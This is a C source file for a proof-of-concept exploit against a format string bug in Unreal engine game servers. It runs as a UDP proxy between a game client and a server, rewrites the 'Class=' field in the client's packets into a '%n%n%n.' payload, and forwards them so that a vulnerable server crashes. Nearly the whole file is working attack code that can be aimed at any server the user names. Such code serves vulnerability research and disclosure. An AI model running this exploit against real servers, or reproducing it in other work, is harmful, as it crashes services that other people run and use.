/*

by Luigi Auriemma

UNIX & WIN VERSION
*/


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include "unrealdec.h"
#include "unrealenc.h"

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define SHIT    sleep(100);     // 100 ms
    DWORD   tid1;
    HANDLE  thandle;
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netdb.h>
    #include <pthread.h>

    #define SHIT    usleep(100000); // 100 ms (useless on Linux)
    pthread_t   tid1;
    int         thandle;
#endif




#define VER     "0.1.1"
#define PORT    7777
#define BUFFSZ  2048




#ifdef WIN32
    static DWORD WINAPI ctos(void *null);
#else
    static void *ctos(void *null);
#endif
u_long resolv(char *host);
void std_err(void);





int                 sd1,
                    sd2;
struct  sockaddr_in peer1,
                    peer2;





int main(int argc, char *argv[]) {
    int         len,
                psz = sizeof(peer1),
                on = 1,
                i;
    u_char      *buff;
    u_short     lport = PORT,
                dport = PORT;
    fd_set      fd_read;


    setbuf(stdout, NULL);

    fputs("\n"
        "Unreal engine format string bug proof-of-concept "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@altervista.org\n"
        "web:    http://aluigi.altervista.org\n"
        "\n", stdout);

    if(argc < 2) {
        printf("\n"
            "Usage: %s [options] <Unreal_server>\n"
            "\n"
            "Options:\n"
            "-l PORT    port to bind (%d)\n"
            "-d PORT    port of the remote server (%d)\n"
            "\n"
            "How to use this proof-of-concept:\n"
            "1) Run this tool using the hostname or the IP of the server you wanna test\n"
            "2) Launch a game that uses the Unreal engine (the same of the server!)\n"
            "3) You must be able to connect to yourself (this proxy)\n"
            "   Usually you must go in the \"Open site\" option of the multiplayer menu\n"
            "   inserting the IP 127.0.0.1\n"
            "4) If the server is vulnerable it will crash immediately\n"
            "\n", argv[0], PORT, PORT);
        exit(1);
    }

    argc--;
    for(i = 1; i < argc; i++) {
        switch(argv[i][1]) {
            case 'l': lport = atoi(argv[++i]); break;
            case 'd': dport = atoi(argv[++i]); break;
            default: {
                printf("\nError: wrong command-line argument (%s)\n", argv[i]);
                exit(1);
                } break;
        }
    }

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

        /* 1 = client */
        /* 2 = server */

    peer1.sin_addr.s_addr = INADDR_ANY;         /* listen for client */
    peer1.sin_port        = htons(lport);
    peer1.sin_family      = AF_INET;

    peer2.sin_addr.s_addr = resolv(argv[argc]); /* connect to server */
    peer2.sin_port        = htons(dport);
    peer2.sin_family      = AF_INET;

    sd1 = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd1 < 0) std_err();
    sd2 = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
    if(sd2 < 0) std_err();

    printf("\n"
        "Server: %s:%hu\n"
        "Binding UDP port %u\n"
        "\n",
        inet_ntoa(peer2.sin_addr),
        dport,
        lport);

    if(setsockopt(sd1, SOL_SOCKET, SO_REUSEADDR, (char *)&on, sizeof(on))
      < 0) std_err();
    if(bind(sd1, (struct sockaddr *)&peer1, psz)
      < 0) std_err();

        /* waiting first packet! */
    fputs("Waiting first packet to start proxy... ", stdout);
    FD_ZERO(&fd_read);
    FD_SET(sd1, &fd_read);
    if(select(sd1 + 1, &fd_read, NULL, NULL, NULL)
      < 0) std_err();
    fputs("let's go\n", stdout);


               /* CLIENT --> SERVER (thread) */
#ifdef WIN32
    thandle = CreateThread(NULL, 0, ctos, 0, 0, &tid1);
    if(!thandle) {
#else
    thandle= pthread_create(&tid1, NULL, ctos, NULL);
    if(thandle) {
#endif
        fputs("\nError: Cannot create the thread\n", stdout);
        exit(1);
    }

    SHIT;   /* to avoid the reading of the unconnected sd2 socket */

               /* SERVER --> CLIENT */
    buff = malloc(BUFFSZ);
    if(!buff) std_err();

    fputs("Server -> Client (active)\n", stdout);
    while(1) {
        len = recvfrom(sd2, buff, BUFFSZ, 0, (struct sockaddr *)&peer2, &psz);
        if(len < 0) std_err();
        if(sendto(sd1, buff, len, 0, (struct sockaddr *)&peer1, psz)
          < 0) std_err();
    }

    return(0);
}






#ifdef WIN32
    static DWORD WINAPI ctos(void *null) {
#else
    static void *ctos(void *null) {
#endif
    int     i,
            len,
            psz = sizeof(peer1);
    u_char  *buff,
            *ptr,
            ecx;

    buff = malloc(BUFFSZ + 1);
    if(!buff) std_err();

    fputs("Client -> Server (active)\n", stdout);
    while(1) {
        len = recvfrom(sd1, buff, BUFFSZ, 0, (struct sockaddr *)&peer1, &psz);
        if(len < 0) std_err();

        if(*buff < 0x12) {

                /* experimental Unreal engine packets decoding */
            ecx = unrealdec(buff, len);

                    /********************/
                    /* BUG EXPLOITATION */
                    /********************/

            ptr = buff;
            for(i = 0; i < len; i++, ptr++) {
                if(!memcmp(ptr, "Class=", 6)) {
                    printf("\n"
                        "Format string bug exploited (check the server)\n"
                        "Details:\n"
                        "  from: \"%s\"\n", ptr);
                    memcpy(ptr + 6, "%n%n%n.", 7);
                    printf("  to:   \"%s\"\n", ptr);

                        /* we could break here but I want to check other Classes */
                    //break;
                }
            }
                    /*************************/
                    /* EXPLOITATION FINISHED */
                    /*************************/

                /* experimental Unreal engine packets encoding */
            unrealenc(buff, len, ecx);
        }

        if(sendto(sd2, buff, len, 0, (struct sockaddr *)&peer2, psz)
          < 0) std_err();
    }

    free(buff);
    return(0);
}






u_long resolv(char *host) {
    struct hostent *hp;
    u_long host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u_long *)hp->h_addr;
    }
    return(host_ip);
}





#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


